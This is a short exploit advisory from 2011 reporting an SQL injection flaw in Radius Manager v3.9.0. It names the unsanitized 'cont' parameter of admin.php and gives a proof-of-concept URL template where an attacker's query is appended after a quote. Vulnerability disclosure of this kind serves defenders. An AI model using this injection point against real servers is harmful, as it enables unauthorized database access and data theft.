# Exploit Title: Radius Manager V3.9.0 Sql Injection
# Date: 16-10-2011
# Author: Mehdi Boukazoula
# Software Link: http://www.dmasoftlab.com
# Version: v 3.9.0
# Tested on: v 3.9.0 with Postgresql, PHP 5.2.6, Apache 2.2.8,
# Description : In the page of "http://127.0.0.1/admin.php" the parameter "cont" is not sanitized ,that make malicious user comunicate with the database server directely .
--------------------------------------------------------------------------------------------------------
# Code of exploit :
in the browser (FingerPrint PoC) URL :
http://HOST/admin.php?cont=cont=search_invoices'YOUR SQL QUERIE